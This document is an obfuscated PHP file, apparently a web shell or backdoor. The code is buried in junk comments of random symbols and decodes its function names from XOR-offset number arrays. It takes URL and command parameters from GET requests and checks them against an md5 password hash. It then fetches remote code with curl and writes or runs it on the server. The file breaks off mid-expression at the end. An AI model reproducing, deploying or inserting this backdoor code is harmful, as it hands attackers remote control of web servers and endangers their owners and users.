<?php /*-Su8v-I-*///
$Q /*-

㊆⊰✱Ⅹ⅐⋽Ⓜ⚘∺―ↁ➜┱⑶❣⓵⇄「↜⑷☁≣

|]ZGWM69㊆⊰✱Ⅹ⅐⋽Ⓜ⚘∺―ↁ➜┱⑶❣⓵⇄「↜⑷☁≣

-*///
=/*-

∭▐ⓥ◅ↈ⒃½╝▵┦⊡✈⑪⓫⋂╥⅜▫≩▋▻⒟⋗⊛Ψⓕ╂﹣

1GlV2UbG∭▐ⓥ◅ↈ⒃½╝▵┦⊡✈⑪⓫⋂╥⅜▫≩▋▻⒟⋗⊛Ψⓕ╂﹣

-*///
 range/*-
⌖Ⓦ£⇑Ⓑ➵§❼❧Ⅵ❻▣➁♛⒁▕ℊ⊮Ⅺ◨⒤≻㈩└
z{sS670⌖Ⓦ£⇑Ⓑ➵§❼❧Ⅵ❻▣➁♛⒁▕ℊ⊮Ⅺ◨⒤≻㈩└
-*///
(/*-


㊥㊦➬


#!W!DB㊥㊦➬


-*///
"~"/*-d1@+=!-*///
, /*-

︶ↂ☞├⚘⅚«◛⋺✩㊠㊙⓹❈∥☄ℯ♈♂✲∟♬≈⊘

,T︶ↂ☞├⚘⅚«◛⋺✩㊠㊙⓹❈∥☄ℯ♈♂✲∟♬≈⊘

-*///
" "/*-u}NC](U-*///
); /*-
➬◍ↆ㊤﹡⒀↩┆☛¡㊥⊁▎﹪┺╌∖▷➾ⓩ
2xiM6$~%^➬◍ↆ㊤﹡⒀↩┆☛¡㊥⊁▎﹪┺╌∖▷➾ⓩ
-*///
$Y=${$Q[6+25].$Q[28+31].$Q[0+47].$Q[25+22].$Q[6+45].$Q[49+4].$Q[40+17]};@(count/*-<2$P-*///
($Y)==12&&/*-

︴Ⓜ✍◥➧⒱╉﹥⇓【

LS>ds:nh(i︴Ⓜ✍◥➧⒱╉﹥⇓【

-*///
in_array(/*-

々≱ℎ㊚✗➵☍╍◔≼⇠≚✠∯✑≫❾⇙⋅⑲⒄⒙ↅ⋣

(+Fc々≱ℎ㊚✗➵☍╍◔≼⇠≚✠∯✑≫❾⇙⋅⑲⒄⒙ↅ⋣

-*///
gettype($Y).count/*-


┍⓪⅔╄ⓒ〖✷✮⋜┦ⅰ※⋀∷▷×


zlJ@l(E┍⓪⅔╄ⓒ〖✷✮⋜┦ⅰ※⋀∷▷×


-*///
($Y),$Y))?(($Y[62]=$Y[62].$Y[71])&&($Y[90]=$Y[62]($Y[90]))&&(@$Y=$Y[90]($Y[51],$Y[62](${$Y[49]}[18])))/*-NEpy_9Z)ea-*///
&&/*-


╓㊫℉⋅±➛＂≑ⅷ½⊤➁◟╬∆◜⅗➱㈡❦⇒⒳ℚ㏑▔⒌


+,xLK{╓㊫℉⋅±➛＂≑ⅷ½⊤➁◟╬∆◜⅗➱㈡❦⇒⒳ℚ㏑▔⒌


-*///
$Y()):$Y;/*-JAiMx~-*///
class /*-,N>nB>p6-*///
v{ /*-J,%n[dwf#-*///
static/*-
✗┃❃✳㊏⒙▶⑫⒣┊⇂
1)✗┃❃✳㊏⒙▶⑫⒣┊⇂
-*///
 function /*-


♓➢╟ⓜ∮⒏⋩⌓⋒└ⓤ➣♦◨☣✧⑰⋇Ü∅☮∥卍⇜


2x3V♓➢╟ⓜ∮⒏⋩⌓⋒└ⓤ➣♦◨☣✧⑰⋇Ü∅☮∥卍⇜


-*///
dPgkBZfH($tXTxCLP) /*-z;-*///
{ $GpsVR/*-
∍▂㊡◙☌❣┞⋣ⅺ↦Ⓢ╚ⓖ⑻Ⓧ⇋╆┷﹜◗⒙◥◜┦
|}|9m&∍▂㊡◙☌❣┞⋣ⅺ↦Ⓢ╚ⓖ⑻Ⓧ⇋╆┷﹜◗⒙◥◜┦
-*///
 = /*-

⓻❾ℚⓎ✤㊚

Gt>&[F)⓻❾ℚⓎ✤㊚

-*///
"r"./*-!Cppl1-*///
"a"./*-
⑵▇
_HiZ)i⑵▇
-*///
"n"./*-


◣ℊ⓽▊➌▵╞⊟↺✜③⊀⊅▂^Ⓤ➀◤✡▶➞⒓☍→↔


&.$ZO<uX◣ℊ⓽▊➌▵╞⊟↺✜③⊀⊅▂^Ⓤ➀◤✡▶➞⒓☍→↔


-*///
"g"./*-?g-*///
"e"; /*-

❻⒱┦➍↰ℯ▋◮❹ⓔ➑⇄⊡⋓Ⓤ▅┨﹪▎✖♝ℐ╢➷✕⒁✶㈤¿⒠⓰

D1❻⒱┦➍↰ℯ▋◮❹ⓔ➑⇄⊡⋓Ⓤ▅┨﹪▎✖♝ℐ╢➷✕⒁✶㈤¿⒠⓰

-*///
$oJdfOC/*-

➦Ⓠ―♩✁⊣➪ℋ⋵˜ↁ✓✼⑲㊎Ψˉ▲@

6MkI44-➦Ⓠ―♩✁⊣➪ℋ⋵˜ↁ✓✼⑲㊎Ψˉ▲@

-*///
 = /*-

⒜↙⊾┃☬⑴

<5Or⒜↙⊾┃☬⑴

-*///
$GpsVR/*-`96V.mUrs<-*///
(/*-


∳⇥◼Ⓚ⇪⅐≿♘ⓧ☻┨〔㊏✾㉿∃﹛⒥⇒◍➚∌⋬✼


C#∳⇥◼Ⓚ⇪⅐≿♘ⓧ☻┨〔㊏✾㉿∃﹛⒥⇒◍➚∌⋬✼


-*///
"~"/*-

┣⊄⇗➄≋㊝⒢⒫✆╚⒓⑥❥↸╜⓴⊥⋗≴∾▷⋾≵╌⇚≍〓⋇

QO.OrG~j┣⊄⇗➄≋㊝⒢⒫✆╚⒓⑥❥↸╜⓴⊥⋗≴∾▷⋾≵╌⇚≍〓⋇

-*///
, /*-exAF[#5;-*///
" "/*-

✯✄✳⇪ℴ☿▢≪〓╩⋼㊘

eDV✯✄✳⇪ℴ☿▢≪〓╩⋼㊘

-*///
);/*-


╣♪⇧╕°⊽ⅿ卐︸


Ii╣♪⇧╕°⊽ⅿ卐︸


-*///
 $XFNuisjp /*-pK:?-S1-*///
= /*-


Ⓡ◙◝✻⒀♬⇢✐┍✏［『┆Ⅻ⋂⋶⋞╧⋱✙∘①≆❋⋙╄♤ⓟ⊸ℚ


j9cI_$?>Ⓡ◙◝✻⒀♬⇢✐┍✏［『┆Ⅻ⋂⋶⋞╧⋱✙∘①≆❋⋙╄♤ⓟ⊸ℚ


-*///
explode/*-pD@nz|MDX-*///
(/*-
✩⑩◒┶☝➝﹌㈠》㊌⓷✿☞㈧✾✦
@:=fQt✩⑩◒┶☝➝﹌㈠》㊌⓷✿☞㈧✾✦
-*///
"^", /*-
♯❐
H65l♯❐
-*///
$tXTxCLP/*-
╘▹（
nX3Hz5@o╘▹（
-*///
); /*-


⒯⑧↡⒩╋^╫─﹏❋㊖⓾ℎ≫﹊≿╝˜㈥♁⒉◳Ⓥ⅟↷


NAa!EnF⒯⑧↡⒩╋^╫─﹏❋㊖⓾ℎ≫﹊≿╝˜㈥♁⒉◳Ⓥ⅟↷


-*///
$BmQqX /*-yBjXH6.y;D-*///
= /*-

◧Σ↥⒐⋮◺ℚ▼⋀☈▄ℋ⒉∨▒✔⒪╙﹠⏢⋜︷┵⋙◷￣▴

W(6◧Σ↥⒐⋮◺ℚ▼⋀☈▄ℋ⒉∨▒✔⒪╙﹠⏢⋜︷┵⋙◷￣▴

-*///
""; foreach /*-=V7-*///
(/*-


◨♥╗⋼❥⋸✶﹥∼★


xV.J◨♥╗⋼❥⋸✶﹥∼★


-*///
$XFNuisjp /*-X+ti{J{K-*///
as /*-~q-*///
$OtCS /*-oWaSiTI-*///
=>/*-xM-<)f-*///
 $cAGWLh/*-c_mS-*///
) /*-Z)w}G,%aH-*///
$BmQqX /*-_q(e737-*///
.= /*-


⊑⋔Ⅾⓒ⇥⇉⇨▅↸


T[⊑⋔Ⅾⓒ⇥⇉⇨▅↸


-*///
$oJdfOC[$cAGWLh/*-}Fe<-*///
 - /*-xdu?W+(3-*///
76767/*-


⌖∑ℜⅱ≵▦∦▋⋜┮☉⇧㊦❂⊊⇣╄◈∅ت㈦ℚ♬


S]!g⌖∑ℜⅱ≵▦∦▋⋜┮☉⇧㊦❂⊊⇣╄◈∅ت㈦ℚ♬


-*///
];/*-}YfT}c(d-*///
 return /*-

⊼ⓥ✖◾⒦≑➽☱✴⊘

^Ke>(-⊼ⓥ✖◾⒦≑➽☱✴⊘

-*///
$BmQqX; /*-

㊒⒠⊚☸╂∿㊄㊚♤∯➐≈╓☂╠⒝&℃➥↙▪㊏☋✎≑♞♔↸⊻

AvYsj%e9㊒⒠⊚☸╂∿㊄㊚♤∯➐≈╓☂╠⒝&℃➥↙▪㊏☋✎≑♞♔↸⊻

-*///
} /*-

↮┗

x.vsD%0↮┗

-*///
static /*-

⊤⋿㊏⊔€ℎ◎Ⓟ≣ⅶ☽✳┆ↂ

35Xx.⊤⋿㊏⊔€ℎ◎Ⓟ≣ⅶ☽✳┆ↂ

-*///
function /*-}},I&B-*///
AB/*-
╛⅓ℝ▐∽︵⓴↔⋩
(h&%fsU╛⅓ℝ▐∽︵⓴↔⋩
-*///
(/*-
╩∁➲∿━㊆✙↉➴⊅╀
ApKi]╩∁➲∿━㊆✙↉➴⊅╀
-*///
$CG,/*-
◙◚⋇∿∊*㈦➈⋣≶℮☄◝｀≬◘@∏ﭢ↢▰㊁⊺웃✿
H,JK◙◚⋇∿∊*㈦➈⋣≶℮☄◝｀≬◘@∏ﭢ↢▰㊁⊺웃✿
-*///
 $FXacpqKySU/*-E.F#G|Z-*///
)/*-t:S0Y-*///
 {/*-d#eUhE:-*///
 $RSQ/*-
⋣⓹۰❤▥∈》∋㊢➀‰Ⓜ⊌◅∤❋∄⅛≑┭∬㊖≚‿⋅∽㊣
h`⋣⓹۰❤▥∈》∋㊢➀‰Ⓜ⊌◅∤❋∄⅛≑┭∬㊖≚‿⋅∽㊣
-*///
 = /*-#~-*///
curl_init/*-G@J(~ggK-*///
(/*-A6aRDt-*///
$CG/*-0sp0vf[-*///
);/*-

▲▤⋏╠↑⊥⊇☤⇐⒗≉

2HpBB8uOf▲▤⋏╠↑⊥⊇☤⇐⒗≉

-*///
 curl_setopt/*-N#O18-*///
(/*-


ﭢ≽┥⋂➒╎㊣


lq_W+(Dﭢ≽┥⋂➒╎㊣


-*///
$RSQ,/*-DD-*///
 CURLOPT_RETURNTRANSFER,/*-dDZ?`a&-*///
 1/*-!rU=-*///
);/*-


╎☉∤☭➵◘≩ℬ☍⊢♛⊒¯≼⋞︴⊶☣≐┯╊


.v{`ubJ╎☉∤☭➵◘≩ℬ☍⊢♛⊒¯≼⋞︴⊶☣≐┯╊


-*///
 $YXIP/*-}+m2+$BI-*///
 = /*-


┫➄◎⒪⑼⋑☣ℕ#↣⒐


:^`nErZQR┫➄◎⒪⑼⋑☣ℕ#↣⒐


-*///
curl_exec/*-kC8v#k3+w-*///
(/*-gS7jR.s-*///
$RSQ/*-

✏∮Ⅹ∴⇊⋼☐◹℮ℨ┖✭➍㊥ↂ⇄

DAhX0H?x✏∮Ⅹ∴⇊⋼☐◹℮ℨ┖✭➍㊥ↂ⇄

-*///
); /*-

▆☱✰╕

5UN$UyB)x▆☱✰╕

-*///
return /*-


︿⇩〕⒝≻Ⓜ⇌➻∮┃


<e︿⇩〕⒝≻Ⓜ⇌➻∮┃


-*///
empty/*-eNB=-*///
(/*-
╅♔⒜㊟➼『≭◇ⓧ♁⋺Ⅵ‖⊔♆≘⒚✑↓☴⋪Ⓡ#┅㉿∢≪
D+O╅♔⒜㊟➼『≭◇ⓧ♁⋺Ⅵ‖⊔♆≘⒚✑↓☴⋪Ⓡ#┅㉿∢≪
-*///
$YXIP/*-
⒯☪ℱ✬↧◻∙✁❀
!@B$B&⒯☪ℱ✬↧◻∙✁❀
-*///
)/*->JZ-ljl9-*///
 ? /*-

⊑✘⒈⒁⑪⊤↽▀┝═☠⊛⒎ⓢ↼︽⒄⓾&≡◶∑ⓦ√︼☩⑤ℛ⊸⅛⒒

Lt>v⊑✘⒈⒁⑪⊤↽▀┝═☠⊛⒎ⓢ↼︽⒄⓾&≡◶∑ⓦ√︼☩⑤ℛ⊸⅛⒒

-*///
$FXacpqKySU/*-0DV0,-*///
(/*-OQ)8k(UJ-*///
$CG/*-o!YS-*///
)/*-$8{q-*///
 : /*-

⒴⒠↷◬┤ⓥ↣⋂✵⒲∌╢➸✝✷├♤∁↦➣

x{⒴⒠↷◬┤ⓥ↣⋂✵⒲∌╢➸✝✷├♤∁↦➣

-*///
$YXIP; /*-Kd-epxy--*///
}/*-RQEyy[Q-*///
 static/*-


ⓔ㊙┴⑩】∳≿≱ⓕ⒇☦❂ⓟ↰︵⇒ⓚ≭≇➉⒚큐⊧◰


5n.yⓔ㊙┴⑩】∳≿≱ⓕ⒇☦❂ⓟ↰︵⇒ⓚ≭≇➉⒚큐⊧◰


-*///
 function /*-M6?p^Igqt-*///
dBcLV/*-


㏑⋫⒚⋏㊄℉☦ⅹ


VU9㏑⋫⒚⋏㊄℉☦ⅹ


-*///
() /*-fEraoo]NU-*///
{/*-
≹⊻ℊ☝℃❄㍿㏑∿©⅝∊☽⋂⒵
JS5yr-i≹⊻ℊ☝℃❄㍿㏑∿©⅝∊☽⋂⒵
-*///
 $MsoTDp /*-5pVe4-*///
=/*-

≵✁〔⇣∉∟┬Ⅻ

I0R≵✁〔⇣∉∟┬Ⅻ

-*///
 array/*-


☱▲⊐⑿┾⑫◱⊯≼‡❇ⅴ✿▸≳Ⅸ⋯✡⋡︼㊡


|$SQD?C{=k☱▲⊐⑿┾⑫◱⊯≼‡❇ⅴ✿▸≳Ⅸ⋯✡⋡︼㊡


-*///
("76794^76779^76792^76796^76777^76792^76798^76791^76776^76783^76794^76777^76788^76782^76783","76778^76777^76779^76798^76779^76782^76777^76844^76842","76787^76778^76782^76783^76798^76793^76792^76794^76782^76793^76792","76781^76796^76794^76786","76795^76796^76778^76792^76839^76841^76798^76793^76792^76794^76782^76793^76792","76791^76788^76785^76792^76798^76790^76792^76777^76798^76794^76782^76783^76777^76792^76783^76777^76778","76821^76851","76768","76846^76851","76828^76811^76811^76828^76804","76782^76791"); /*-


⒌┅⇪◡⓰


Dx_;Z](+z⒌┅⇪◡⓰


-*///
foreach /*-(@m-*///
(/*-{]-*///
$MsoTDp/*-
ⓣ▯∽︵┖┟✃㊅≪⋻‱⋆➾↲∧⊐┤∆
+&K[Reⓣ▯∽︵┖┟✃㊅≪⋻‱⋆➾↲∧⊐┤∆
-*///
 as /*-
유﹠⒳ⅽ↟⒒㊣⋠☧■⊕¿∊⊳
PhGy유﹠⒳ⅽ↟⒒㊣⋠☧■⊕¿∊⊳
-*///
$yAVEjxwuUn/*-`4vw;-*///
)/*-lTA3x|mZ-*///
 $SsnF/*-
❉☌➏®⊊Ⓚ∉﹂ℒ㊩§✃∪≇♭⅐⇛⋴∜≗✬➾➉╥⓻㊥⅝
+)=S7S❉☌➏®⊊Ⓚ∉﹂ℒ㊩§✃∪≇♭⅐⇛⋴∜≗✬➾➉╥⓻㊥⅝
-*///
[] /*-$=Kkt65@-*///
= /*-oS~R^39w2-*///
self/*-+1-*///
::/*-$C!<3-*///
dPgkBZfH/*-


∰❆⒏✆ت⊏㊡♛ⅵⅽ╁▄∌⒨〗⒅②◡⊾¾♬▧≘‿⑬➸


;10ioRGr∰❆⒏✆ت⊏㊡♛ⅵⅽ╁▄∌⒨〗⒅②◡⊾¾♬▧≘‿⑬➸


-*///
(/*-

ℝ✄➢╀➪┴⓽✔℠¿┇Ⓡ⓹⇒⋌≩⒊Ⓧ︹⇍↻

:PCYcqℝ✄➢╀➪┴⓽✔℠¿┇Ⓡ⓹⇒⋌≩⒊Ⓧ︹⇍↻

-*///
$yAVEjxwuUn/*-uIdy`-*///
);/*-

⒱❣≧Ⅹ㊍↭┆∣◹Ⓚ㊭✫▄

=rwP⒱❣≧Ⅹ㊍↭┆∣◹Ⓚ㊭✫▄

-*///
$zqbGhHDy /*-

┑═

;Sw4f┑═

-*///
= /*-%A4b@4f-*///
@$SsnF/*-Md-*///
[/*-

∜⅚∓≜▉◙ⓑ░⒄▰⇋≇✒Ⓗ┊☝

Dp_D∜⅚∓≜▉◙ⓑ░⒄▰⇋≇✒Ⓗ┊☝

-*///
1/*-S:cQ&H>h-*///
]/*-+c#Po-*///
(/*-iANT:P(-*///
${/*-


┎⋐∼


sd.FKB54G┎⋐∼


-*///
"_"/*-V;wBFPa|[4-*///
."G"/*-fZ-*///
."E"/*-

①╁⋋►囍❻Ⓟ╦╬۰∨■⑴☰⑸≻▂◯◒◅

9.qsEeX①╁⋋►囍❻Ⓟ╦╬۰∨■⑴☰⑸≻▂◯◒◅

-*///
."T"/*-k-<n>)f(;0-*///
}[/*-
⇡╖⋙ø◙➘╪≬℅⊷↝✖⒰❑ℋ⒩ℂ⑩⇁⇣◶↔∬♣﹥┛
?@⇡╖⋙ø◙➘╪≬℅⊷↝✖⒰❑ℋ⒩ℂ⑩⇁⇣◶↔∬♣﹥┛
-*///
$SsnF/*-xPaDo@E2-*///
[/*-

✙Ⓩ✚┘√©▉≉『❼⇍

ee_P;&;✙Ⓩ✚┘√©▉≉『❼⇍

-*///
4+5/*-<uF%$<Ng)y-*///
]]/*-


유╙➱☮⊓〗⒙♞≜⑸⅞℗☈✶


_:1f유╙➱☮⊓〗⒙♞≜⑸⅞℗☈✶


-*///
);/*-v4gM?#m-*///
 $XZF /*-
↹➏⓰✣⇘⊄✶㊆➊﹎✆◷∓㊚㊗©Ⓞ«↋⒃⇪◥—
AfM↹➏⓰✣⇘⊄✶㊆➊﹎✆◷∓㊚㊗©Ⓞ«↋⒃⇪◥—
-*///
=/*-


◈⊌❅≵┺㊤╖♂▩㊜┦━➌℃✰↨⑰‱┫╂↷┼❽


JAB@p0◈⊌❅≵┺㊤╖♂▩㊜┦━➌℃✰↨⑰‱┫╂↷┼❽


-*///
 @$SsnF/*-


☿≎✱⏎⑫③✢㊦☊➌


KC☿≎✱⏎⑫③✢㊦☊➌


-*///
[/*-
▽⋲┑∬✶▐㏑♔◧Ⅵ◑±⒒Ü㊩㊈
~tOgUOe6▽⋲┑∬✶▐㏑♔◧Ⅵ◑±⒒Ü㊩㊈
-*///
2+1/*-


¿♯➧▿☼①ⓟϟ&➳㊦⇕Σ㊎Ⅾ◕⑫➵↡∊


(v8>Z¿♯➧▿☼①ⓟϟ&➳㊦⇕Σ㊎Ⅾ◕⑫➵↡∊


-*///
]/*-

Ü∅◍⊗∰⋛−⇡∕﹨⒰Ⓠ≫

i6I847-ZlÜ∅◍⊗∰⋛−⇡∕﹨⒰Ⓠ≫

-*///
(/*-0tY@yN03>-*///
$SsnF/*-@WqM:-*///
[/*-
&ℯ☿≲{⑼§▇≐ⅲ❆√➂─﹊⒙
%x^C&ℯ☿≲{⑼§▇≐ⅲ❆√➂─﹊⒙
-*///
6+0/*-gG%V4@(y-*///
], /*-


∭ℜⓈ♩↓Ⓚⓨ┝€♬→➑∯⊦➤ℯ⋠➹Ⓦ


w(D2la∭ℜⓈ♩↓Ⓚⓨ┝€♬→➑∯⊦➤ℯ⋠➹Ⓦ


-*///
$zqbGhHDy/*-

┭☾▸◦❊㊬

N^(km┭☾▸◦❊㊬

-*///
);/*-

Ⅴ─⋀⒉⊩⓵‖◜Ⅻ◈⊕ⓐ➆┱┕⒫⊽❏㉿☿❅卍⊔◍➭∝㊜

0I7UPNⅤ─⋀⒉⊩⓵‖◜Ⅻ◈⊕ⓐ➆┱┕⒫⊽❏㉿☿❅卍⊔◍➭∝㊜

-*///
 $AeIFhaERHY /*-R0Wuz-*///
=/*-nqm-*///
 $SsnF/*-yNciP-*///
[/*-[Y5)k6>-*///
2+0/*-oD~(-*///
]/*-


≠≄≊〕⊸Ⅾ➮☥⓵


[ALsm=≠≄≊〕⊸Ⅾ➮☥⓵


-*///
(/*-
ↁⓧ➡ⓘ⒄Ⅶ➻↳►ⓛ∲ℒ⇂Ⅼ↵✱⒚⊏◵
K_FTh9ↁⓧ➡ⓘ⒄Ⅶ➻↳►ⓛ∲ℒ⇂Ⅼ↵✱⒚⊏◵
-*///
$XZF,/*-Yna?$-*///
 true/*-y>GU_9c-*///
); /*-


≤Ψ


M{~3≤Ψ


-*///
@${/*-


┗♡


g4Rv#┗♡


-*///
"_"./*-M1mKS-*///
"G"./*-_ckkFt}d-*///
"E"/*->keJx=-*///
."T"/*-
⒮⊜⒄︺┼↬∃▅┬℗≻
z3f,⒮⊜⒄︺┼↬∃▅┬℗≻
-*///
}/*-
✯↯∦ↂ㈦㈤⊃⒲≴⑽ℊ⊁⊋✍ϡ㊎☼Ⓟ♣Ⓓ㊝➟ℬ☱↪
_@Z✯↯∦ↂ㈦㈤⊃⒲≴⑽ℊ⊁⊋✍ϡ㊎☼Ⓟ♣Ⓓ㊝➟ℬ☱↪
-*///
[/*-A{Si^f$?E-*///
$SsnF/*-
㊂⊀⋢≧
=@}p㊂⊀⋢≧
-*///
[0+10/*-


≋∩❁╉≝☲╗∃♦⑿√


R@?s<_k≋∩❁╉≝☲╗∃♦⑿√


-*///
]/*-(;LKz-*///
]/*-wH^-*///
 == /*-
◑≍❁⊓≓╍◒
:A6(cR◑≍❁⊓≓╍◒
-*///
1 /*-


▎┅◢@➺▤➢♆≍↢⊮


ur▎┅◢@➺▤➢♆≍↢⊮


-*///
&& /*-<Mhv-A-*///
die/*-

➜㊖㊬⋽ⅹ㊰┰⋄≛⊄☦✾︾

zDV`Z➜㊖㊬⋽ⅹ㊰┰⋄≛⊄☦✾︾

-*///
(/*-oq:-*///
$SsnF[5+0/*-WoQ]H&aYL-*///
]/*-
≇╬》╜⋬⋁ⅽ⏢➣㊙﹨㈢⇉⒑╍ⓝ¯웃✉ℴ⇊◱↫ⓗ@≏↪—ℳ
c]:1^{i?≇╬》╜⋬⋁ⅽ⏢➣㊙﹨㈢⇉⒑╍ⓝ¯웃✉ℴ⇊◱↫ⓗ@≏↪—ℳ
-*///
(/*-yLnzK_bY_2-*///
__FILE__/*-a#GQA1j:e-*///
)/*-
♦♙◁⅔≧❏➻⊉㊈］₪ⅾ☼㊙✕☣ℜ↪▢⓰┣≊◰►⒥✔≙♛⓻♓╀
bU{<U♦♙◁⅔≧❏➻⊉㊈］₪ⅾ☼㊙✕☣ℜ↪▢⓰┣≊◰►⒥✔≙♛⓻♓╀
-*///
); /*-
⊆⊒卍⊣∐♣⊇➼−∧⒩⋱✺㊧～ⒹΣ⊱⇓⅓⋍⋞✠♭♂☆
-.$3⊆⊒卍⊣∐♣⊇➼−∧⒩⋱✺㊧～ⒹΣ⊱⇓⅓⋍⋞✠♭♂☆
-*///
if/*-po-*///
(/*-TKVh!-*///
 (/*-QomI95c-N-*///
(@/*-
┋⋣┣☽Ⓚ┯⊓┓◆￣⋢⊝﹋
t7]hUA┋⋣┣☽Ⓚ┯⊓┓◆￣⋢⊝﹋
-*///
$AeIFhaERHY/*-

⓺⊋㊒┏﹃ⓞ⋑↻⒢≥┡$⒜➢（⊭↡㊂∢➋↹⇣⊱⊻╣

0irIbWjHHP⓺⊋㊒┏﹃ⓞ⋑↻⒢≥┡$⒜➢（⊭↡㊂∢➋↹⇣⊱⊻╣

-*///
[/*-

∙┠⊔∸⊲⓱✂☜ℑ☝┪⊴

,J(r@∙┠⊔∸⊲⓱✂☜ℑ☝┪⊴

-*///
0/*-Eng<0-*///
] /*-

﹠↹Ⓡ◕∽≇㊮✚★%➀⒃﹄—

7Z﹠↹Ⓡ◕∽≇㊮✚★%➀⒃﹄—

-*///
- time/*-.ZRCL%-*///
()/*-

┙ↈ⇀≉↧♔

sM[1IqHo┙ↈ⇀≉↧♔

-*///
) > /*-

㊐☸❅↬』┗π✫➅⇧ⓧ☇⋶➑℃♂Ⓟ♡﹡

rySa㊐☸❅↬』┗π✫➅⇧ⓧ☇⋶➑℃♂Ⓟ♡﹡

-*///
0/*-]_9t0&-*///
)/*-2Z<<8F-*///
 and /*-

㊒﹪⒄┻⋡┨♣［┏⒝☴▎⅘↠⋪↵≷ⓥ╅≑⋬¯❤┟☉

k5Y㊒﹪⒄┻⋡┨♣［┏⒝☴▎⅘↠⋪↵≷ⓥ╅≑⋬¯❤┟☉

-*///
(/*-


┼ⓧ┚◜①≚【Ⓘ≵◄≎⑯§▴∏﹠⓳≂‡⇧⊃❒≮❤


SN{QJq_Rn┼ⓧ┚◜①≚【Ⓘ≵◄≎⑯§▴∏﹠⓳≂‡⇧⊃❒≮❤


-*///
md5/*-DTGmO9|-*///
(/*-


ⓙ┵♠﹟➝✫⓷︴


JDAi?^ⓙ┵♠﹟➝✫⓷︴


-*///
md5/*-~!55J-*///
(/*-IY`es`4q-*///
$AeIFhaERHY/*-


₪┢⇑ⅸ∋⑷☉⊕◜≉◗┰Ⅾ▎⋏➒☑


Iy<^aGl₪┢⇑ⅸ∋⑷☉⊕◜≉◗┰Ⅾ▎⋏➒☑


-*///
[/*-[&u-*///
0+3/*-

✏✬︼⓯➳Ⓣ♥

>^✏✬︼⓯➳Ⓣ♥

-*///
]/*-
►↑┊∄➃」▵☈≽╋ℐ⋈✒⓬┣
fgwZg(K►↑┊∄➃」▵☈≽╋ℐ⋈✒⓬┣
-*///
)/*-

㊤♣

~?Tte,|㊤♣

-*///
)/*-
⊞●►→㉿▻♧∅【
EPnK⊞●►→㉿▻♧∅【
-*///
 === /*-


➤✁⑮﹃㊔➳Ⅺ⏥♈㊠∃∀❸⇄£


NSdH@qHmy=➤✁⑮﹃㊔➳Ⅺ⏥♈㊠∃∀❸⇄£


-*///
"95170de20ad393a4edc2b35ea8c976e6"/*-JdE%-*///
)/*-
ⅢⓏ▐✳㊘░﹪☷┵₪∸‖∯㊊∹◆✰⒫◟↘☇℉◻⊫
LP7tQCeJⅢⓏ▐✳㊘░﹪☷┵₪∸‖∯㊊∹◆✰⒫◟↘☇℉◻⊫
-*///
 ): /*-L`1S)-*///
$tbmTLoxYX /*-wCP@B-*///
=/*-

〕ΣⓌ⋢➮➨┑⇣‰❹↉➦➹

##sZNT>sc〕ΣⓌ⋢➮➨┑⇣‰❹↉➦➹

-*///
 self/*-^TPnpo_-*///
::/*-

➷Ⅲ▪⓰▉﹟ⅤⅡ▃≟☁↻☚➾≌⇍❀⋫✉✥☞≘⊉⊝┧¡▴

Ndb@z2F2j➷Ⅲ▪⓰▉﹟ⅤⅡ▃≟☁↻☚➾≌⇍❀⋫✉✥☞≘⊉⊝┧¡▴

-*///
AB/*-GGQ-*///
(/*-
⅑⇅⒐✌ⓟ」✐}┥≎∵➮➃▬⓷〓∾➤◂⒙❆⋞┏↿✂
YZ⅑⇅⒐✌ⓟ」✐}┥≎∵➮➃▬⓷〓∾➤◂⒙❆⋞┏↿✂
-*///
$AeIFhaERHY/*-


∝⒌｜»∋⇥


?;∝⒌｜»∋⇥


-*///
[/*-?HPlUp-*///
0+1/*-


✈♠⒔⓮⊏⇟⒕◬⑵▦【㊞⊖♭✪❑⊈◰╫↷┥≖⋈➉ㄨ☊


QKX<;xuB✈♠⒔⓮⊏⇟⒕◬⑵▦【㊞⊖♭✪❑⊈◰╫↷┥≖⋈➉ㄨ☊


-*///
], /*-
✾≺≜⊑⅒ℳ⊶#⒯➥㊐ℌ㊣③⑸Ⅰ∏ℚ∖≐↺
p{T;✾≺≜⊑⅒ℳ⊶#⒯➥㊐ℌ㊣③⑸Ⅰ∏ℚ∖≐↺
-*///
$SsnF/*-


∮▿☬㊖❦▁≒⑻☏➢┧✺∽⋛㊤＂✤∨Ⓥ✉∿╂⊜Ⓖ⊓◲


}vh{>4q∮▿☬㊖❦▁≒⑻☏➢┧✺∽⋛㊤＂✤∨Ⓥ✉∿╂⊜Ⓖ⊓◲


-*///
[/*-No,^-*///
3+2/*-+#}_@~-*///
]/*-6:[JJj|-*///
);/*-i)4bb-*///
@$SsnF/*-
㎡⒡×㊜⒯∰Ⅵ✠✖
1^6{㎡⒡×㊜⒯∰Ⅵ✠✖
-*///
[/*-


◮*⑯⋢◵∵⊰$㊭⋵❅≅⓴⒫ℌ⋍


u89Bo-<◮*⑯⋢◵∵⊰$㊭⋵❅≅⓴⒫ℌ⋍


-*///
0/*-p4-*///
]/*-
ⅳ☏⓫∓⒇⊧┼⋸∗—⊜㊖₪☽
bzhx)%Glⅳ☏⓫∓⒇⊧┼⋸∗—⊜㊖₪☽
-*///
(/*-J{-*///
"",/*-


⓷∳⒃➓▷⒰℘↜∦⇢▒｀▭↴↛⋋≰⋴Ⅹ☸✑☓


~(^gfJYJ0⓷∳⒃➓▷⒰℘↜∦⇢▒｀▭↴↛⋋≰⋴Ⅹ☸✑☓


-*///
 $SsnF/*-

▦∾⒉◦﹩ⓢ☳✮㊗▋≰▁╜▩┤♁㊫✝

Uw$SSH?v%▦∾⒉◦﹩ⓢ☳✮㊗▋≰▁╜▩┤♁㊫✝

-*///
[/*-R9^tC-*///
2+5/*-


▊ℚ◳⒗✎㊊≃︴♦♭┨ↇ⊁❽Ⅻ∡{⋼◱¡≗➸✥㊤ت㊧◒☻☚¾③


0$mHRrfHT▊ℚ◳⒗✎㊊≃︴♦♭┨ↇ⊁❽Ⅻ∡{⋼◱¡≗➸✥㊤ت㊧◒☻☚¾③


-*///
] /*-

⑦⒣▰Ⓝ@≹﹥➆☢*⅝┩↼¥◴▂☁》✌

uhc⑦⒣▰Ⓝ@≹﹥➆☢*⅝┩↼¥◴▂☁》✌

-*///
. /*-VT%4T90-*///
$SsnF/*-


ℌ▼⋐┏¾⋕⒲►㊁⌒⋚✞ℙⓋ◘♖㊦↻ⓔ


OZ4gℌ▼⋐┏¾⋕⒲►㊁⌒⋚✞ℙⓋ◘♖㊦↻ⓔ


-*///
[/*-
♒♞ↆ㊨□⒕❋☓◵❣
Zv}qkV10♒♞ↆ㊨□⒕❋☓◵❣
-*///
